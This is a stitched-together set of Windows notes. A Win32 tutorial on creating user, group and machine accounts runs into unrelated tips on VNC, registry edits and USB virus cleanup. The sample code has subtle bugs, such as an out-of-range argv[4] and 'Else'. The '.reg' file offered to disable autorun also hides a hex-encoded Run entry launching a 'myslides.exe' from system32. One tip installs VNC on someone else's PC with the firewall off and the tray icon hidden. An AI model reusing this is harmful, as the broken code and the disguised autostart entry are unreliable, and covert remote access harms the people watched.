KEY_QUERY_VALUE
Required to query the values of a registry key.
KEY_READ
69
Combines the STANDARD_RIGHTS_READ, KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY values.
KEY_SET_VALUE
Required to create, delete, or set a registry value.
KEY_WOW64_64KEY
Enables a 64- or 32-bit application to open a 64-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values.
KEY_WOW64_32KEY
Enables a 64- or 32-bit application to open a 32-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values.
KEY_WRITE
Combines the STANDARD_RIGHTS_WRITE, KEY_SET_VALUE, and KEY_CREATE_SUB_KEY access rights.
Table 5.
When you call the RegOpenKeyEx() function, the system checks the requested access rights against the key's security descriptor. If the user does not have the correct access to the registry key, the open operation fails. If an administrator needs access to the key, the solution is to enable the SE_TAKE_OWNERSHIP_NAME privilege and open the registry key with WRITE_OWNER access. You can request the ACCESS_SYSTEM_SECURITY access right to a registry key if you want to read or write the key's SACL.
Further reading and digging:
For Multibytes, Unicode characters and Localization please refer to Locale, wide characters & Unicode (Story) and Windows users & groups programming tutorials (Implementation).
70
Structure, enum, union and typedef story can be found C/C++ struct, enum, union & typedef.
Notation used in MSDN is Hungarian Notation instead of CamelCase and is discussed Windows programming notations.
Windows data type information is in Windows data types used in Win32 programming.
Check the best selling C, C++ and Windows books at Amazon.com.
Microsoft Visual C++, online MSDN.
MSDN library.
C++ Tutorial
My Training Period: xx hours. Before you begin, read some instruction here. This is a continuation from previous Windows User Accounts & Groups Programming 3.
The expected skills are:
Able to understand users and groups as implemented in Windows OSes.
Able to understand and use functions to manipulate users, groups and machine account.
Able to gather and understand the required information in order to use those functions.
Able to understand, appreciate and apply how the Unicode/wide character implemented in Microsoft C programs.
Privilege and User Management
As a restricted user, to run your program in debug mode you must be a member of the Debugger Users group. The following example will try to shows how a privilege is required to accomplish our task. First of all by using the previous program example, let add restricted users as a member of
71
Debugger Users group so that he can run programs in debug mode. Make sure you remove mytestgroup from the Administrators group as a result of the previous program example.
A sample output:
F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#1
mypersonal\myuser#1 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#2
mypersonal\myuser#2 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#3
mypersonal\myuser#3 has been added successfully to Debugger Users on mypersonal machine.
F:\myproject\win32prog\Debug>
72
Then log off and log on as restricted user myuser#1 and start using Visual C++ .Net. First of all let try running our previous, first program example, creating users.
//********* myuserprog.cpp **********
// For WinXp
#define _WIN32_WINNT 0x0501
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif
73
#include <windows.h>
#include <stdio.h>
#include <lm.h>
// This program accept 3 arguments: servername, username and password.
// It is run on local WinXp machine so the servername is the
// local WinXp machine name or you can use NULL for the 1st parameter
// of the NetUserAdd() and arguments, should be without the servername.
int wmain(int argc, wchar_t *argv[ ])
{
USER_INFO_1 ui;
DWORD dwLevel = 1;
DWORD dwError = 0;
NET_API_STATUS nStatus;
if(argc != 4)
{
fwprintf(stderr, L"Usage: %s ServerName UserName Password.\n", argv[0]);
// or use fwprintf(stderr, L"Usage: %s UserName Password.\n", argv[0]);
// for local machine and adjust other argc and argv[] array element appropriately.
74
exit(1);
}
// Set up the USER_INFO_1 structure.
// USER_PRIV_USER: name identifies an normal user
// UF_SCRIPT: required for LAN Manager 2.0 and Windows NT and later.
ui.usri1_name = argv[2]; // Username entered through command line
ui.usri1_password = argv[4]; // Password
ui.usri1_priv = USER_PRIV_USER; // As a normal/restricted user
ui.usri1_home_dir = NULL; // No home directory
75
ui.usri1_comment = L"This is a test normal user account using NetUserAdd"; // Comment
ui.usri1_flags = UF_SCRIPT; // Must be UF_SCRIPT
ui.usri1_script_path = NULL; // No script path
// Call the NetUserAdd() function, specifying level 1.
nStatus = NetUserAdd(argv[1],
dwLevel,
(LPBYTE)&ui,
&dwError);
// If the call succeeds, inform the user.
76
if(nStatus == NERR_Success)
{
fwprintf(stderr, L"%s user has been successfully added on %s machine.\n", argv[2], argv[1]);
fwprintf(stderr, L"Username: %s password: %s.\n", argv[2], argv[3]);
}
// Otherwise, print the system error.
else
fprintf(stderr, "A system error has occurred: %d\n", nStatus);
return 0;
}
A sample output:
77
F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#1 12345678
user#1 user has been successfully added on mypersonal machine.
Username: user#1 password: 12345678.
F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#2 12345678
user#2 user has been successfully added on mypersonal machine.
Username: user#2 password: 12345678.
F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#3 12345678
user#3 user has been successfully added on mypersonal machine.
78
Username: user#3 password: 12345678.
F:\myuserprog\myuserprog\Debug>
Figure 5: user#1, user#2 and user#3 have been created.
Well, we can create a user account, just being a member of the Debugger Users group. Then let test the previous program that creates a local group.
//********* myuserproglg.cpp **********
79
// For WinXp
#define _WIN32_WINNT 0x0501
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <lm.h>
80
// This program accept 3 arguments: servername, GroupName and Comment.
int wmain(int argc, wchar_t *argv[ ])
{
LOCALGROUP_INFO_1 lgi1;
DWORD dwLevel = 1;
DWORD dwError = 0;
NET_API_STATUS nStatus;
if(argc != 4)
{
fwprintf(stderr, L"Usage: %s ServerName GroupName Comment\n", argv[0]);
// Just exit, no further processing
exit(1);
}
// Set up the LOCALGROUP_INFO_1 structure.
// Assign the group name and comment
lgi1.lgrpi1_name = argv[2]; // Local group name
lgi1.lgrpi1_comment = argv[3]; // Comment
81
// Call the NetLocalGroupAdd() function, specifying level 1.
nStatus = NetLocalGroupAdd(argv[1],
dwLevel,
(LPBYTE)&lgi1,
&dwError);
// If the call succeeds, inform the user.
if(nStatus == NERR_Success)
fwprintf(stderr, L"%s local group has been created successfully on %s machine.\n", argv[2], argv[1]);
// Otherwise, print the system error.
else
fprintf(stderr, "A system error has occurred: %d\n", nStatus);
return 0;
}
A sample output:
F:\myuserprog\myuserprog\Debug>myuserproglg
Usage: myuserproglg ServerName GroupName Comment
F:\myuserprog\myuserprog\Debug>myuserproglg mypersonal normalusergroup "Created by restricted user"
normalusergroup local group has been created successfully on mypersonal machine.
F:\myuserprog\myuserprog\Debug>
Verify our task.
82
Figure 6: normalusergroup group has been created.
Also successful. Then test adding a user to a group program example. When running the previous program example to add user as a member of built-in Users and Power Users groups, from the output, the following error code displayed.
A sample output:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\myuser#1>f:
F:\myuserprog\myuserprog\Debug>mynewaddmember
Usage: mynewaddmember ServerName GroupName MemberAccountName-(DomainName\AccountName)
F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal Users mypersonal\user#1
83
A system error has occurred: 5
F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal "Power Users" mypersonal\user#1
A system error has occurred: 5
F:\myuserprog\myuserprog\Debug>
This error code means: 5 - Access is denied (ERROR_ACCESS_DENIED). So as a restricted user, we don’t have privilege, because of the access token that we are carrying doesn’t has permission to complete the task.
Creating a Local Group and Adding a User
Windows Server 2003 family, Windows XP, Windows 2000, and Windows NT use the same functions that Microsoft LAN Manager uses to create and maintain user and local group-account information. For example, to create a new local group, call the NetLocalGroupAdd() function. To add a user to that group, call the NetLocalGroupAddMembers() function. The following program allows you to create a user and a local group and then add the user to the local group.
The following program example has been run on Windows 2000 member server of jmtibm.com domain. Its Fully Qualified Domain Name (FQDN) is jmti_st_00.jmtibm.com and the Domain Controller’s (DC) FQDN is mawar.jmtibm.com. The member server was logged on as Domain Administrator. Compiler used is Visual C++ 6.0. The steps to include the netapi32.lib library (or other library) to the project in Visual C++ 6.0 are shown below.
84
Project menu → Setting... sub menu. Then click the Link tab on the right page. Under Object/Library modules: type manually the library name at the end of the list separated by a space. Click the OK button.
Figure 7: Adding library to Visual C++ project.
85
Figure 8: Another step of adding library to Visual C++ project.
The let run our program example that create a new user and a group, then include the user as a member of that group.
//********* myusrgrp.cpp ************
// Network management functions have their own
// error codes...
#define WIN32_WINNT 0x0500
#define UNICODE 1
#include <windows.h>
#include <lmcons.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <lmapibuf.h>
#include <stdio.h>
#include <stdlib.h>
NET_API_STATUS MyTestNet(LPWSTR lpszDomain,
LPWSTR lpszUser,
LPWSTR lpszPassword,
LPWSTR lpszLocalGroup )
{
USER_INFO_1 user_info;
86
LOCALGROUP_INFO_1 localgroup_info;
LOCALGROUP_MEMBERS_INFO_3 localgroup_members;
LPWSTR lpszPrimaryDC = L"mawar";
NET_API_STATUS err = 0;
DWORD parm_err = 0;
// First get the name of the primary domain controller. Make sure to free the returned buffer.
err = NetGetDCName(L"mawar", // Local machine
lpszDomain, // Domain name, if NULL use lpszPrimaryDC
(LPBYTE *)&lpszPrimaryDC ); // Returned PDC
if(err != 0)
{
printf("Error getting DC name: %d\n", err);
return(err);
}
// Set up the USER_INFO_1 structure.
user_info.usri1_name = lpszUser;
87
user_info.usri1_password = lpszPassword;
user_info.usri1_priv = USER_PRIV_USER;
user_info.usri1_home_dir = TEXT("");
user_info.usri1_comment = TEXT("This is just a sample user lol!");
user_info.usri1_flags = UF_SCRIPT;
user_info.usri1_script_path = TEXT("");
err = NetUserAdd(lpszPrimaryDC, // PDC name
1, // Level, use other level for more information
(LPBYTE)&user_info, // Input buffer
&parm_err); // Parameter in error
switch (err)
{
case 0:
printf("%ls user successfully created.\n", user_info.usri1_name);
88
break;
case NERR_UserExists:
printf("%ls user already exists.\n", user_info.usri1_name);
err = 0;
break;
case ERROR_INVALID_PARAMETER:
{
printf("Invalid Parameter Error adding user: Parameter Index = %d\n", parm_err);
NetApiBufferFree(lpszPrimaryDC);
return(err);
}
default:
printf("Error adding %ls user: %d\n", user_info.usri1_name, err);
NetApiBufferFree(lpszPrimaryDC);
return(err);
}
// Set up the LOCALGROUP_INFO_1 structure.
localgroup_info.lgrpi1_name = lpszLocalGroup;
localgroup_info.lgrpi1_comment = TEXT("This is just a sample Local group.");
err = NetLocalGroupAdd(lpszPrimaryDC, // PDC name
89
1, // Level
(LPBYTE)&localgroup_info, // Input buffer
&parm_err); // Parameter in error
switch (err)
{
case 0:
printf("%ls Local Group successfully created.\n", localgroup_info.lgrpi1_name);
break;
case ERROR_ALIAS_EXISTS:
printf("%ls Local Group already exists.\n", localgroup_info.lgrpi1_name);
err = 0;
break;
case ERROR_INVALID_PARAMETER:
{
printf("Invalid Parameter Error adding Local Group: Parameter Index = %d\n", err, parm_err);
NetApiBufferFree(lpszPrimaryDC);
return(err);
}
default:
90
printf("Error adding %ls Local Group: %d\n", localgroup_info.lgrpi1_name, err);
NetApiBufferFree(lpszPrimaryDC);
return(err);
}
// Now add the user to the local group.
localgroup_members.lgrmi3_domainandname = lpszUser;
err = NetLocalGroupAddMembers(lpszPrimaryDC, // PDC name
lpszLocalGroup, // Group name
3, // Name
(LPBYTE)&localgroup_members, // Buffer
1); // Count
switch(err)
{
case 0:
printf("%ls user successfully added to %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
break;
case ERROR_MEMBER_IN_ALIAS:
printf("User %ls already in %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
err = 0;
break;
91
default:
printf("Error adding %ls user to %ls Local Group: %d\n", user_info.usri1_name, localgroup_info.lgrpi1_name, err);
break;
}
NetApiBufferFree(lpszPrimaryDC);
return (err);
}
// This program run at command prompt, receives 4 arguments: The domain name,
// user name (user account), user password and the group name.
int wmain(int argc, wchar_t *argv[])
{
NET_API_STATUS err = 0;
if(argc != 5)
{
printf("Usage: %ls <domain_name> <user_name> <password> <group_name>\n", argv[0]);
exit (-1);
}
printf("Calling MyTestNet(): Create a user and a group then,\n");
printf("add the user to the group.\n");
92
printf("===================================================.\n");
err = MyTestNet(argv[1], // domain name
argv[2], // user account
argv[3], // password for the user
argv[4]); // group name
printf("MyTestNet() returned %d\n", err);
return (0);
}
A sample output:
C:\myproject\win32prog\Debug>myusrgrp
Usage: myusrgrp <domain_name> <user_name> <password> <group_name>
C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup
Calling MyTestNet(): Create a user and a group then,
add the user to the group.
===================================================.
mytestuser user successfully created.
mytestgroup Local Group successfully created.
mytestuser user successfully added to mytestgroup Local Group.
MyTestNet() returned 0
93
Rerun the program with same arguments.
A sample output:
C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup
Calling MyTestNet(): Create a user and a group then,
add the user to the group.
===================================================.
mytestuser user already exists.
mytestgroup Local Group already exists.
User mytestuser already in mytestgroup Local Group.
MyTestNet() returned 0
It looks OK. Then verify our task.
Figure 9: mytestuser user and mytestgroup group have been created.
94
The mytestuser user still not usable because there is no login name setting etc. Use NetUserSetInfo() function with different level to set other properties of the user account as demonstrated in the previous program example. For domain user account, when you try to delete the account there is a message prompted whether the mailbox of that user also need to be deleted. This means email account also has been created for that account.
Creating a New Computer Account
The following program example demonstrates how to create a new computer account using the NetUserAdd() function. The following are considerations for managing computer accounts:
The computer account name should be all uppercase for consistency with Windows NT or later account management utilities.
A computer account name always has a trailing dollar sign ($). Any functions used to manage computer accounts must build the computer name such that the last character of the computer account name is a dollar sign ($). For interdomain trust, the account name is TrustingDomainName$.
The maximum computer name length is MAX_COMPUTERNAME_LENGTH (15). This length does not include the trailing dollar sign ($).
The password for a new computer account should be the lowercase representation of the computer account name, without the trailing dollar sign ($). For interdomain trust, the password can be an arbitrary value that matches the value specified on the trust side of the relationship.
The maximum password length is LM20_PWLEN (14). The password should be truncated to this length if the computer account name exceeds this length.
The password provided at computer-account-creation time is valid only until the computer account becomes active on the domain. A new password is established during trust relationship activation.
95
The program example has been run on Windows 2000 member server of jmtibm.com domain same as the previous example.
//********* machineacct.cpp *********
// For Win 2000
#define _WIN32_WINNT 0x0500
// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <lm.h>
BOOL AddMachineAccount(LPWSTR wTargetComputer, LPWSTR MachineAccount, DWORD AccountType)
{
LPWSTR wAccount;
LPWSTR wPassword;
USER_INFO_1 ui;
DWORD cbAccount;
DWORD cbLength;
DWORD dwError;
96
// Ensure a valid computer account type was passed.
if(AccountType != UF_WORKSTATION_TRUST_ACCOUNT &&
AccountType != UF_SERVER_TRUST_ACCOUNT &&
AccountType != UF_INTERDOMAIN_TRUST_ACCOUNT)
{
SetLastError(ERROR_INVALID_PARAMETER);
return FALSE;
}
else
printf("Computer account type is valid.\n");
// Obtain the number of chars in computer account name.
cbLength = cbAccount = lstrlenW(MachineAccount);
// Ensure computer name doesn't exceed maximum length.
if(cbLength > MAX_COMPUTERNAME_LENGTH)
{
SetLastError(ERROR_INVALID_ACCOUNT_NAME);
return FALSE;
}
Else
printf("Computer name length is valid.\n");
// Allocate storage to contain Unicode representation of
97
// computer account name + trailing $ + NULL.
wAccount = (LPWSTR)HeapAlloc(GetProcessHeap(), 0,
(cbAccount + 1 + 1) * sizeof(WCHAR) // Account + '$' + NULL
);
if(wAccount == NULL) return FALSE;
else printf("Memory allocation is OK.\n");
// Password is the computer account name converted to lowercase;
// you will convert the passed MachineAccount in place.
wPassword = MachineAccount;
// Copy MachineAccount to the wAccount buffer allocated while
// converting computer account name to uppercase.
// Convert password (in place) to lowercase.
while(cbAccount--) {
wAccount[cbAccount] = towupper(MachineAccount[cbAccount]);
wPassword[cbAccount] = towlower(wPassword[cbAccount]);
}
// Computer account names have a trailing Unicode '$'.
wAccount[cbLength] = L'$';
wAccount[cbLength + 1] = L'\0'; // terminate the string
// If the password is greater than the max allowed, truncate.
98
if(cbLength > LM20_PWLEN) wPassword[LM20_PWLEN] = L'\0';
else printf("No truncation was done to the password, the length is OK, max is 14.\n");
// Initialize the USER_INFO_1 structure.
ZeroMemory(&ui, sizeof(ui));
ui.usri1_name = wAccount;
ui.usri1_password = wPassword;
ui.usri1_flags = AccountType | UF_SCRIPT;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_comment = L"A virtual machine created by NetUserAdd()...";
dwError = NetUserAdd(
wTargetComputer, // target computer name
1, // info level
(LPBYTE) &ui, // buffer
NULL
);
// Release the allocated memory.
if(wAccount) HeapFree(GetProcessHeap(), 0, wAccount);
// Indicate whether the function was successful.
if(dwError == NO_ERROR)
{
99
printf("%ls computer account successfully created on %ls DC.\n", MachineAccount, wTargetComputer);
return TRUE;
}
Else
{
SetLastError(dwError);
return FALSE;
}
}
// This program run at command prompt, receives 2 arguments: The target server and the machine account name.
int wmain(int argc, wchar_t *argv[])
{
if(argc != 3)
{
printf("Usage: %s <TargetComputer> <MachineAccount/Password>.\n", argv[0]);
exit (-1);
}
DWORD AccountType = UF_WORKSTATION_TRUST_ACCOUNT;
BOOL Test = AddMachineAccount(argv[1], argv[2], AccountType);
printf("The return value is: %u\n", Test);
100
return 0;
}
A sample output:
C:\myproject\win32prog\Debug>machineacct
Usage: machineacct <TargetComputer> <MachineAccount/Password>.
C:\myproject\win32prog\Debug>machineacct Mawar mymachine
Computer account type is valid.
Computer name length is valid.
Memory allocation is OK.
No truncation was done to the password, the length is OK, max is 14.
mymachine computer account successfully created on Mawar DC.
The return value is: 1Verify our task.
101
Figure 10: MYMACHINE computer account has been created.The user that calls the account management functions must have Administrator privilege on the target computer. In the case of existing computer accounts, the creator of the account can manage the account, regardless of administrative membership.
The SeMachineAccountPrivilege can be granted on the target computer to give specified users the ability to create computer accounts. This gives non-administrators the ability to create computer accounts. The caller needs to enable this privilege prior to adding the computer account.
------------------------User Accounts and Groups: Story and Program Examples, Part II-----------------------
Registry Key for Clear history of Remote Desktop Connections
Registry:
Start>Run>Regedit>OK
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
Then find the entry that you want to remove and delete it.
If you connect to the same PC all the time then you can also add this in as the default option to avoid having to use the dropdown each time.
VNC Remote access software Download the "Windows Self Installing Package" After you have downloaded it you will need to go to the offender’s pc's install the software which is easy and simple. You will need to install the "Server" client for the kid’s pc and for your pc install the "Viewer".
102
After you have installed the software on the kids PC's you will need to click on the VNC Icon at the bottom corner of the screen. It will now ask you to put a password in the box and also confirm it in another box. Apply those settings then your good to go. Oh and dont forget to take of the Windows Firewall or make and exception within the program for VNC. When you go onto your PC click on "VNC Viewer". This will open up the viewer software. It will now ask you to put the IP Address or Computer Name in the box to connect to it. You need to know what ip adress the kids are on. There are many ways of doing this. Here are some examples: 1.) Press start and type in "cmd" in the "search programs and files" box and press enter. A black box will appear. Type in "IPCONFIG /ALL" (Dont forget there is a space in that command). It will now show you lots of static content.....You need the "IPv4 Address". It will probs be somthing like this: 192.168.1.3 2.) Another way is by going onto your router and finding where it says "DHCP Leases". This will show who is connected or who has a lease on your router. ***This way is probs the best as there IP Address can change from time to time unless you change the lease time*** Manually in Registry Editor to hide tray icon in the customize notification(it is in the right side bottom) NOTE: This will only turn on or off Always show icons and notifications on the taskbar. 1. Open the Start Menu.
2. In the search box, type regedit and press Enter. (See screenshot below)
103
3. In regedit, navigate to the location below. (See screenshot below step 4) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
3. In the right pane, right click on EnableAutoTray and click on Modify. (See screenshot above)
5. To Turn On "Always show all taskbar icons and notifcations" A) Type in 0 (zero) and click on OK. (see screenshot below)
104
B) Go to step 7.
6. To Turn Off "Always show all taskbar icons and notifcations"
A) Type in 1 and click on OK. (see screenshot above)
7. Close Regedit.
8.Log off and log on, or restart the computer to apply the changes.
Internet Explorera Cut Lock Pannuvathu
Open your registry and find the key below.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
Change the value of "ProxyEnable" and set it to "1". Change the value of "ProxyServer" and set it to an IP address and port that is invalid on your network such as "10.0.0.1:5555" (i.e. "IP:Port").
By changing these settings Internet access will be disabled for any applications that rely of the Microsoft proxy server information such as Internet Explorer, Microsoft Office, Opera browser.
To stop users from modifying the proxy settings add these restrictions to disable changes to the Internet configuration.
Find or create the key below:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
Create two DWORD values named "Connection Settings" and "Connwiz Admin Lock" and set them both to "1".
To remove the restriction, set the proxy settings back to their original values and delete the policy values.
Note: The change will take effect immediately for any new browser windows, existing Internet Explorer sessions will not be affect
105
ed until the browser is closed and reopened
How to Remove Programs with Delete Command Prompt
Author: Tomaz | Posted at: 4/18/2009 | Filed Under: tutorial |
One of the the tasks you can do using command prompt is to completely uninstall every program in your computer. Of course it is far easier to use standard add/remove or special third‐party uninstallers but in some rare cases there is no other way to uninstall program than through command prompt. For example when you have to boot into corrupted Windows with so called boot with command prompt. Here we are going to take a look at how to uninstall CCleaner using delete command prompt function.
Open Start>run>cmd. Enter "cd %programfiles%" and press enter. Type "dir /p" without quotes. You will see the list of all your programs now. To delete‐uninstall CCleaner type rd /s "CCleaner" and press "Y". This will permanently delete this program so be sure you know this is what you want. You can delete any program using this method just replace the name with what you want to delete. Read also how to uninstall programs using command prompt.
You are here: Home / How To / Files on External/Flash Drive Changed to Shortcuts Virus
Files on External/Flash Drive Changed to Shortcuts Virus
106
Issue
I caught a virus on my flash drive at work and it appears to have changed all my file names to short cuts. I believe I’ve cleaned the virus but how do i get my files back so that I can view them?
Solution
* If you did not format your flash drive, then check whether the files are not in hidden mode. * Click on “Start” –>Run–>type cmd and click on OK. * Check your external Drive letter in My Computer * Here I assume your external drive as G: * Enter this command. * attrib -h -r -s /s /d g:*.* * Delete the unnecessary shortcuts.
Note: Replace the letter g with your flash drive letter.
Kill Autorun Step 1: Create .bat file like "KillAutorun.bat" paste below code to bat file. attrib -r autorun.inf del autorun.inf md autorun.inf attrib +r +h autorun.inf Dissable_auto_run.reg Step 2:
107
Creating .reg File "Dissable_auto_run.reg" to stop windows Auto run. REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDriveAutoRun"=dword:000000ff [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] "Policies"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,\ 77,69,6e,64,6f,77,73,33,32,5f,72,61,69,6e,73,74,65,72,5c,6d,79,73,6c,69,64,\ 65,73,2e,65,78,65,00 Step 3: Palce both files (Dissable_auto_run.reg and KillAutorun.bat) in USB root. Execute(doubble Click) KillAutorun.bat Step 4: Assume USB drive id is "I:" Open I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\ in this folder will have some exe file Eg: myslides.exe Create one batch file same as Step 1. Eg: Create .bat file like "KillAutorun.bat" paste below code to bat file. attrib -r myslides.exe del myslides.exe md myslides.exe attrib +r +h myslides.exe Run this bat file from "I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\" Note: S-1-5-21-1482476501-3352491937-682996330-1013 this folder name will differ from one system to another system.
108
Thanks and Regards Rajesh Natarajan MCDBA India
33. A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512,
K:1024, Z:33554432